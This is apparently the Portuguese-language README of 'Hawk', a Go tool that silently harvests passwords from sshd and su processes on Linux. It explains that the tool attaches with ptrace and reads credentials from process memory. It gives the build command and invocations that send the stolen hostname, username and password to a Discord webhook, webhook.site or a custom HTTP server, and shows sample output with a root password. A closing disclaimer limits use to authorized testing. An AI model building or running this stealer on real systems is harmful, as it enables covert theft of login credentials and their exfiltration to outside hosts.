
Ferramenta Golang projetada para exfiltrar senhas encontradas através dos serviços sshd e su
Intercepte silenciosamente credenciais SSH e SU em tempo real
O Hawk monitora processos sshd e su, extraindo senhas da memória via ptrace sem modificar os processos alvo. Zero gravações. Coleta de credenciais puramente somente-leitura.

O Hawk aproveita o sistema de arquivos /proc do Linux para descobrir processos SSH e SU e, em seguida, usa ptrace para anexar e interceptar chamadas de sistema. Quando a autenticação por senha ocorre, ele lê a senha diretamente da memória do processo durante a chamada de sistema write()—completamente transparente para o processo alvo. As credenciais são exfiltradas via webhook ou impressas na stdout.
Aprofundamento: Post do Blog
GOOS=linux GOARCH=amd64 CGO_ENABLED=0 go build -o hawk
O Hawk detecta automaticamente webhooks do Discord e envia mensagens formatadas:
./hawk https://discord.com/api/webhooks/YOUR_WEBHOOK_ID/YOUR_WEBHOOK_TOKEN
Configuração: Crie um webhook no seu servidor Discord seguindo o guia de webhooks do Discord. As credenciais aparecerão no seu canal formatadas com hostname, nome de usuário e senha.
Para outros serviços de webhook (webhook.site, servidores personalizados, etc.):
# HTTPS (auto-detected)
./hawk https://webhook.site/your-unique-id
# HTTP
./hawk http://192.168.1.100:6969/webhook
# Auto HTTPS if no protocol specified
./hawk webhook.example.com/path
Sem webhook? As credenciais são impressas na stdout:
./hawk
Saída:
hostname=server01 username=root password=SuperSecret123
/proc montadoEsta ferramenta é apenas para testes de segurança autorizados e fins educacionais. O acesso não autorizado a sistemas de computador é ilegal. Use com responsabilidade e apenas em sistemas que você possui ou para os quais tem permissão explícita de teste.